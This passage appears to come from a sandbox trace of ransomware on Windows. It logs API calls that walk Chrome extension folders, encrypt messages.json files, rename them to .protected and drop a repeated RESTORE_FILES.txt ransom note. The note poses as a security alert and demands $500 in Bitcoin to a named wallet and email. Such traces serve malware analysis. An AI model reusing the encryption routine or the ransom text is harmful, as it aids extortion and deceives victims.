(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.698] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.698] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.698] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.698] CloseHandle (hObject=0x164) returned 1 [0080.698] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.698] lstrcmpiW (lpString1="sv", lpString2="Windows") returned -1 [0080.698] lstrcmpiW (lpString1="sv", lpString2="Program Files") returned 1 [0080.698] lstrcmpiW (lpString1="sv", lpString2="Program Files (x86)") returned 1 [0080.698] lstrcmpiW (lpString1="sv", lpString2="$Recycle.bin") returned 1 [0080.698] lstrcmpiW (lpString1="sv", lpString2="System Volume Information") returned -1 [0080.698] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv") returned 141 [0080.698] lstrcmpW (lpString1="sv", lpString2=".") returned 1 [0080.698] lstrcmpW (lpString1="sv", lpString2="..") returned 1 [0080.698] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\*") returned 143 [0080.698] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.699] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.699] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.699] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.699] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.699] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.699] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\.") returned 143 [0080.699] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.699] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.699] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.699] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.699] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.699] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.699] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.699] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\..") returned 144 [0080.699] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.699] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.699] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.699] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.699] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.699] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.699] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.699] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.699] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json") returned 155 [0080.699] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.699] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.699] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.699] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.699] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.700] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json") returned 155 [0080.700] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.700] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json") returned 155 [0080.700] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.700] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json") returned 155 [0080.700] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.700] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0080.700] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.701] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0080.701] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.701] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.701] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.701] CloseHandle (hObject=0x168) returned 1 [0080.701] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json.protected") returned 165 [0080.701] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\messages.json.protected")) returned 1 [0080.701] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.702] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.702] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\RESTORE_FILES.txt") returned 159 [0080.702] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sv\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.702] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.702] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.703] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.703] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.703] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.703] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.703] CloseHandle (hObject=0x164) returned 1 [0080.703] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.703] lstrcmpiW (lpString1="sw", lpString2="Windows") returned -1 [0080.703] lstrcmpiW (lpString1="sw", lpString2="Program Files") returned 1 [0080.703] lstrcmpiW (lpString1="sw", lpString2="Program Files (x86)") returned 1 [0080.703] lstrcmpiW (lpString1="sw", lpString2="$Recycle.bin") returned 1 [0080.703] lstrcmpiW (lpString1="sw", lpString2="System Volume Information") returned -1 [0080.703] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw") returned 141 [0080.703] lstrcmpW (lpString1="sw", lpString2=".") returned 1 [0080.703] lstrcmpW (lpString1="sw", lpString2="..") returned 1 [0080.703] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\*") returned 143 [0080.703] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.704] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.704] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.704] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.704] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.704] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.704] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\.") returned 143 [0080.704] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.704] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.704] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.704] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.704] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.704] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.704] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.704] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\..") returned 144 [0080.704] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.704] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.704] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.704] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.704] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.704] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.704] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.704] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.704] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json") returned 155 [0080.704] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.704] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.704] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.704] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.704] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.705] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json") returned 155 [0080.705] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.705] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json") returned 155 [0080.705] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.705] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json") returned 155 [0080.705] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.705] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xc4, lpOverlapped=0x0) returned 1 [0080.706] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff3c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.706] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xc4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xc4, lpOverlapped=0x0) returned 1 [0080.706] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.706] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.706] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.706] CloseHandle (hObject=0x168) returned 1 [0080.706] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json.protected") returned 165 [0080.706] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\messages.json.protected")) returned 1 [0080.707] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.707] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.707] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\RESTORE_FILES.txt") returned 159 [0080.707] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\sw\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.707] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.707] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.708] lstrlenA 